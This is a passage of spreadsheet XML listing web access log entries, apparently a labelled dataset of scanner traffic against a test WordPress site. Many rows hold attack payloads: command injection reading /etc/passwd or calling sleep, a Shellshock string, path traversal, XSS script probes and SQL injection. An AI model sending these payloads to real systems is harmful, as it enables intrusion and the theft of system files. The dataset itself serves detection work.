      <c r="E27" s="2" t="inlineStr"/>
      <c r="F27" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G27" s="3" t="inlineStr"/>
      <c r="H27" s="3" t="inlineStr"/>
    </row>
    <row r="28">
      <c r="A28" s="2" t="n">
        <v>27</v>
      </c>
      <c r="B28" s="2" t="inlineStr">
        <is>
          <t>srbh-2d63e782f07c6c59</t>
        </is>
      </c>
      <c r="C28" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-admin/load-styles.php?c=0%26%26cat+%2Fetc%2Fpasswd&amp;dir=ltr&amp;load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&amp;ver=4.9.5 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D28" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-admin/load-styles.php</t>
        </is>
      </c>
      <c r="E28" s="2" t="inlineStr">
        <is>
          <t>c=0&amp;&amp;cat /etc/passwd&amp;dir=ltr&amp;load[]=dashicons,buttons,forms,l10n,login&amp;ver=4.9.5</t>
        </is>
      </c>
      <c r="F28" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G28" s="3" t="inlineStr"/>
      <c r="H28" s="3" t="inlineStr"/>
    </row>
    <row r="29">
      <c r="A29" s="2" t="n">
        <v>28</v>
      </c>
      <c r="B29" s="2" t="inlineStr">
        <is>
          <t>srbh-e10e296075566a08</t>
        </is>
      </c>
      <c r="C29" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/amet-et-deleniti-tenetur-minima HTTP/1.1" 404 58226 "http://test-site.com/blog/index.php/sample-page/amet-et-deleniti-tenetur-minima/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D29" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\/amet-et-deleniti-tenetur-minima</t>
        </is>
      </c>
      <c r="E29" s="2" t="inlineStr"/>
      <c r="F29" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G29" s="3" t="inlineStr"/>
      <c r="H29" s="3" t="inlineStr"/>
    </row>
    <row r="30">
      <c r="A30" s="2" t="n">
        <v>29</v>
      </c>
      <c r="B30" s="2" t="inlineStr">
        <is>
          <t>srbh-de9ed7674f0eb70e</t>
        </is>
      </c>
      <c r="C30" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/04/04/labore-pariatur-amet-quam/ HTTP/1.1" 200 21408 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36"</t>
        </is>
      </c>
      <c r="D30" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/04/04/labore-pariatur-amet-quam/</t>
        </is>
      </c>
      <c r="E30" s="2" t="inlineStr"/>
      <c r="F30" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36</t>
        </is>
      </c>
      <c r="G30" s="3" t="inlineStr"/>
      <c r="H30" s="3" t="inlineStr"/>
    </row>
    <row r="31">
      <c r="A31" s="2" t="n">
        <v>30</v>
      </c>
      <c r="B31" s="2" t="inlineStr">
        <is>
          <t>srbh-bcacde0e3626dc12</t>
        </is>
      </c>
      <c r="C31" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-admin/load-styles.php?c=0&amp;dir=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&amp;ver=4.9.5 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D31" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-admin/load-styles.php</t>
        </is>
      </c>
      <c r="E31" s="2" t="inlineStr">
        <is>
          <t>c=0&amp;dir='"&lt;script&gt;alert(1);&lt;/script&gt;&amp;load[]=dashicons,buttons,forms,l10n,login&amp;ver=4.9.5</t>
        </is>
      </c>
      <c r="F31" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G31" s="3" t="inlineStr"/>
      <c r="H31" s="3" t="inlineStr"/>
    </row>
    <row r="32">
      <c r="A32" s="2" t="n">
        <v>31</v>
      </c>
      <c r="B32" s="2" t="inlineStr">
        <is>
          <t>srbh-9a8b95a7b19cffaf</t>
        </is>
      </c>
      <c r="C32" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-login.php?_wpnonce=7de0abcdc2&amp;action=logout&amp;redirect_to=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 403 2953 "http://test-site.com/blog/index.php/registration/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D32" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-login.php</t>
        </is>
      </c>
      <c r="E32" s="2" t="inlineStr">
        <is>
          <t>_wpnonce=7de0abcdc2&amp;action=logout&amp;redirect_to="&gt;&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="F32" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G32" s="3" t="inlineStr"/>
      <c r="H32" s="3" t="inlineStr"/>
    </row>
    <row r="33">
      <c r="A33" s="2" t="n">
        <v>32</v>
      </c>
      <c r="B33" s="2" t="inlineStr">
        <is>
          <t>srbh-a927760a53894b4b</t>
        </is>
      </c>
      <c r="C33" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/admin-bar.min.js?ver=4.9.5 HTTP/1.1" 200 7188 "-" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D33" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/admin-bar.min.js</t>
        </is>
      </c>
      <c r="E33" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5</t>
        </is>
      </c>
      <c r="F33" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G33" s="3" t="inlineStr"/>
      <c r="H33" s="3" t="inlineStr"/>
    </row>
    <row r="34">
      <c r="A34" s="2" t="n">
        <v>33</v>
      </c>
      <c r="B34" s="2" t="inlineStr">
        <is>
          <t>srbh-6b51f2ef7a294588</t>
        </is>
      </c>
      <c r="C34" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020/04/4b6aa405-8ac7-33d8-9366-43fcef53f97a.png.log HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D34" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/&lt;*&gt;.png.log</t>
        </is>
      </c>
      <c r="E34" s="2" t="inlineStr"/>
      <c r="F34" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G34" s="3" t="inlineStr"/>
      <c r="H34" s="3" t="inlineStr"/>
    </row>
    <row r="35">
      <c r="A35" s="2" t="n">
        <v>34</v>
      </c>
      <c r="B35" s="2" t="inlineStr">
        <is>
          <t>srbh-09a0e244ed1c462d</t>
        </is>
      </c>
      <c r="C35" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd/my-account/edit-profile/%7B%7B%20data.link HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/edit-profile/%7B%7B%20data.link%20%7D%7D" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D35" s="2" t="inlineStr">
        <is>
          <t>/blog//../../../../../../../../../../../../../../../../etc/passwd/my-account/edit-profile/{{ data.link</t>
        </is>
      </c>
      <c r="E35" s="2" t="inlineStr"/>
      <c r="F35" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G35" s="3" t="inlineStr"/>
      <c r="H35" s="3" t="inlineStr"/>
    </row>
    <row r="36">
      <c r="A36" s="2" t="n">
        <v>35</v>
      </c>
      <c r="B36" s="2" t="inlineStr">
        <is>
          <t>srbh-2c46681fd98ac435</t>
        </is>
      </c>
      <c r="C36" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/plugins/user-registration/assets/js/inputmask.swp HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D36" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/plugins/user-registration/assets/js/inputmask.swp</t>
        </is>
      </c>
      <c r="E36" s="2" t="inlineStr"/>
      <c r="F36" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G36" s="3" t="inlineStr"/>
      <c r="H36" s="3" t="inlineStr"/>
    </row>
    <row r="37">
      <c r="A37" s="2" t="n">
        <v>36</v>
      </c>
      <c r="B37" s="2" t="inlineStr">
        <is>
          <t>srbh-793a7e0638c90857</t>
        </is>
      </c>
      <c r="C37" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/plugins/user-registration/assets/css/my-account-layout.css?ver=1.8.2.1%3Bcat+%2Fetc%2Fpasswd%3B HTTP/1.1" 200 3366 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D37" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/plugins/user-registration/assets/css/my-account-layout.css</t>
        </is>
      </c>
      <c r="E37" s="2" t="inlineStr">
        <is>
          <t>ver=1.8.2.1;cat /etc/passwd;</t>
        </is>
      </c>
      <c r="F37" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G37" s="3" t="inlineStr"/>
      <c r="H37" s="3" t="inlineStr"/>
    </row>
    <row r="38">
      <c r="A38" s="2" t="n">
        <v>37</v>
      </c>
      <c r="B38" s="2" t="inlineStr">
        <is>
          <t>srbh-08bedb024d7ae9ea</t>
        </is>
      </c>
      <c r="C38" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%2527%2522%253Cscript%253Ealert%25281%2529%253B%253C%252Fscript%253E/my-account/edit-profile/%7B%7B%20data.size.url%20%7D%7D HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/edit-profile/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D38" s="2" t="inlineStr">
        <is>
          <t>/blog/'"&lt;script&gt;alert(1);&lt;/script&gt;/my-account/edit-profile/{{ data.size.url }}</t>
        </is>
      </c>
      <c r="E38" s="2" t="inlineStr"/>
      <c r="F38" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G38" s="3" t="inlineStr"/>
      <c r="H38" s="3" t="inlineStr"/>
    </row>
    <row r="39">
      <c r="A39" s="2" t="n">
        <v>38</v>
      </c>
      <c r="B39" s="2" t="inlineStr">
        <is>
          <t>srbh-1a076964989f9d80</t>
        </is>
      </c>
      <c r="C39" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/page/3/?s=%28%29+%7B+%3A%3B%7D%3B+%2Fbin%2Fsleep+15 HTTP/1.1" 404 58249 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D39" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/page/3/</t>
        </is>
      </c>
      <c r="E39" s="2" t="inlineStr">
        <is>
          <t>s=() { :;}; /bin/sleep 15</t>
        </is>
      </c>
      <c r="F39" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G39" s="3" t="inlineStr"/>
      <c r="H39" s="3" t="inlineStr"/>
    </row>
    <row r="40">
      <c r="A40" s="2" t="n">
        <v>39</v>
      </c>
      <c r="B40" s="2" t="inlineStr">
        <is>
          <t>srbh-52c1c8c47f7ceee5</t>
        </is>
      </c>
      <c r="C40" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/03/22%27+AND+%28SELECT+3273+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x3a727a613a%2C%28SELECT+%28ELT%283273%3D3273%2C1%29%29%29%2C0x3a6172743a%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29+AND+%27mUth%27%3D%27mUth HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/page/2/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D40" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03/22'+and+(select+3273+from(select+count(*),concat(0x3a727a613a,(select+(elt(3273=3273,1))),0x3a6172743a,floor(rand(0)*2))x+from+information_schema.CHARACTER_SETS+group+by+x)a)+and+'mUth'='mUth</t>
        </is>
      </c>
      <c r="E40" s="2" t="inlineStr"/>
      <c r="F40" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G40" s="3" t="inlineStr"/>
      <c r="H40" s="3" t="inlineStr"/>
    </row>
    <row r="41">
      <c r="A41" s="2" t="n">
        <v>40</v>
      </c>
      <c r="B41" s="2" t="inlineStr">
        <is>
          <t>srbh-04c9f73ebc9473b6</t>
        </is>
      </c>
      <c r="C41" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/uploads/2020/04/aa129ea8-5161-37b5-acab-9d6386eeec9c-300x240.png HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/est-reiciendis-laboriosam-aperiam-adipisci-non/embed/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D41" s="2" t="inlineStr">
        <is>
          <t>/blog//../../../../../../../../../../../../../../../..//uploads/2020/04/&lt;*&gt;-300x240.png</t>
        </is>
      </c>
      <c r="E41" s="2" t="inlineStr"/>
      <c r="F41" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G41" s="3" t="inlineStr"/>
      <c r="H41" s="3" t="inlineStr"/>
    </row>
    <row r="42">
      <c r="A42" s="2" t="n">
        <v>41</v>
      </c>
      <c r="B42" s="2" t="inlineStr">
        <is>
          <t>srbh-7dbf8dd6b57a3f45</t>
        </is>
      </c>
      <c r="C42" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/css/media-views.min.css?ver=4.9.5%27%26sleep+15%26%27 HTTP/1.1" 200 40076 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D42" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/css/media-views.min.css</t>
        </is>
      </c>
      <c r="E42" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5'&amp;sleep 15&amp;'</t>
        </is>
      </c>
      <c r="F42" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G42" s="3" t="inlineStr"/>
      <c r="H42" s="3" t="inlineStr"/>
    </row>
    <row r="43">
      <c r="A43" s="2" t="n">
        <v>42</v>
      </c>
      <c r="B43" s="2" t="inlineStr">
        <is>
          <t>srbh-02c14a99d1aaa99c</t>
        </is>
      </c>
      <c r="C43" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020/04/38536cfd-4e8b-3340-b4c4-af387cc163a8-1024x682.jpg.bak HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D43" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/&lt;*&gt;-1024x682.jpg.bak</t>
        </is>
      </c>
      <c r="E43" s="2" t="inlineStr"/>
      <c r="F43" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G43" s="3" t="inlineStr"/>
      <c r="H43" s="3" t="inlineStr"/>
    </row>
    <row r="44">
      <c r="A44" s="2" t="n">
        <v>43</v>
      </c>
      <c r="B44" s="2" t="inlineStr">
        <is>
          <t>srbh-99cdd26fe5a1e0a6</t>
        </is>
      </c>
      <c r="C44" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/media-models.min.js?ver=4.9.5%27%3Bcat+%2Fetc%2Fpasswd%3B%27 HTTP/1.1" 200 13533 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D44" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/media-models.min.js</t>
        </is>
      </c>
      <c r="E44" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5';cat /etc/passwd;'</t>
        </is>
      </c>
      <c r="F44" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G44" s="3" t="inlineStr"/>
      <c r="H44" s="3" t="inlineStr"/>
    </row>
    <row r="45">
      <c r="A45" s="2" t="n">
        <v>44</v>
      </c>
      <c r="B45" s="2" t="inlineStr">
        <is>
          <t>srbh-fa948dbc48ecfd75</t>
        </is>
      </c>
      <c r="C45" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/?s=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 57360 "http://test-site.com/blog/index.php/search/phone" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D45" s="2" t="inlineStr">
        <is>
          <t>/blog/</t>
        </is>
      </c>
      <c r="E45" s="2" t="inlineStr">
        <is>
          <t>s="&gt;&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="F45" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G45" s="3" t="inlineStr"/>
      <c r="H45" s="3" t="inlineStr"/>
    </row>
    <row r="46">
      <c r="A46" s="2" t="n">
        <v>45</v>
      </c>
      <c r="B46" s="2" t="inlineStr">
        <is>
          <t>srbh-13406b26d3cf7954</t>
        </is>
      </c>
      <c r="C46" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/03/22+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23/quidem-rerum-sit-doloribus-quia-eum/embed HTTP/1.1" 404 53918 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D46" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03/22+union+all+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#/quidem-rerum-sit-doloribus-quia-eum/embed</t>
        </is>
      </c>
      <c r="E46" s="2" t="inlineStr"/>
      <c r="F46" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G46" s="3" t="inlineStr"/>
      <c r="H46" s="3" t="inlineStr"/>
    </row>
    <row r="47">
      <c r="A47" s="2" t="n">
        <v>46</v>
      </c>
      <c r="B47" s="2" t="inlineStr">
        <is>
          <t>srbh-7f79e94680059c64</t>
        </is>
      </c>
      <c r="C47" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/registration/.htaccess HTTP/1.1" 404 58226 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D47" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/registration/.htaccess</t>
        </is>
      </c>
      <c r="E47" s="2" t="inlineStr"/>
      <c r="F47" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G47" s="3" t="inlineStr"/>
      <c r="H47" s="3" t="inlineStr"/>
    </row>
    <row r="48">
      <c r="A48" s="2" t="n">
        <v>47</v>
      </c>
      <c r="B48" s="2" t="inlineStr">
        <is>
          <t>srbh-822228526fd63b54</t>
        </is>
      </c>
      <c r="C48" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/48cf902e-a565-3e60-8512-c19e2e6a72db-300x200.jpg HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/2020/04/04/ipsa-ea-porro-distinctio/embed/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D48" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/../../../../../../../../../../../../../../../../etc/passwd/&lt;*&gt;-300x200.jpg</t>
        </is>
      </c>
      <c r="E48" s="2" t="inlineStr"/>
      <c r="F48" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G48" s="3" t="inlineStr"/>
      <c r="H48" s="3" t="inlineStr"/>
    </row>
    <row r="49">
      <c r="A49" s="2" t="n">
        <v>48</v>
      </c>
      <c r="B49" s="2" t="inlineStr">
        <is>
          <t>srbh-6264d450dbb0ce52</t>
        </is>
      </c>
      <c r="C49" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/index.php/my-account/edit-profile/ HTTP/1.1" 200 58054 "http://test-site.com/blog/index.php/my-account/edit-profile/" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D49" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/</t>
        </is>
      </c>
      <c r="E49" s="2" t="inlineStr"/>
      <c r="F49" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G49" s="3" t="inlineStr"/>
      <c r="H49" s="3" t="inlineStr"/>
    </row>
    <row r="50">
      <c r="A50" s="2" t="n">
        <v>49</v>
      </c>
      <c r="B50" s="2" t="inlineStr">
        <is>
          <t>srbh-211953b527837231</t>
        </is>
      </c>
      <c r="C50" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020%22+UNION+ALL+select+NULL+--+/04/48cf902e-a565-3e60-8512-c19e2e6a72db-300x200.jpg HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/2020/04/04/ipsa-ea-porro-distinctio/embed/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D50" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020"+union+all+select+null+--+/04/&lt;*&gt;-300x200.jpg</t>
        </is>
      </c>
      <c r="E50" s="2" t="inlineStr"/>
      <c r="F50" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G50" s="3" t="inlineStr"/>
      <c r="H50" s="3" t="inlineStr"/>
    </row>
    <row r="51">
      <c r="A51" s="2" t="n">
        <v>50</v>
      </c>
      <c r="B51" s="2" t="inlineStr">
        <is>
          <t>srbh-f13fbf4dd3066c57</t>
        </is>
      </c>
      <c r="C51" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1%22%3Bsleep+15%3B%22 HTTP/1.1" 200 11232 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D51" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css</t>
        </is>
      </c>
      <c r="E51" s="2" t="inlineStr">
        <is>
          <t>ver=4.2.6-78496d1";sleep 15;"</t>
        </is>
      </c>
      <c r="F51" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G51" s="3" t="inlineStr"/>
      <c r="H51" s="3" t="inlineStr"/>
    </row>
    <row r="52">
      <c r="A52" s="2" t="n">
        <v>51</v>
      </c>
      <c r="B52" s="2" t="inlineStr">
        <is>
          <t>srbh-f675f70537bc3a0c</t>
        </is>
      </c>
      <c r="C52" s="2" t="inlineStr">
        <is>
      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      </is>
      </c>
      <c r="D52" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/'"&lt;script&gt;alert(1);&lt;/script&gt;/edit-profile/{{ data.link</t>
        </is>
      </c>
      <c r="E52" s="2" t="inlineStr"/>
      <c r="F52" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G52" s="3" t="inlineStr"/>
      <c r="H52" s="3" t="inlineStr"/>
    </row>
    <row r="53">
      <c r="A53" s="2" t="n">
        <v>52</v>
      </c>
      <c r="B53" s="2" t="inlineStr">
        <is>
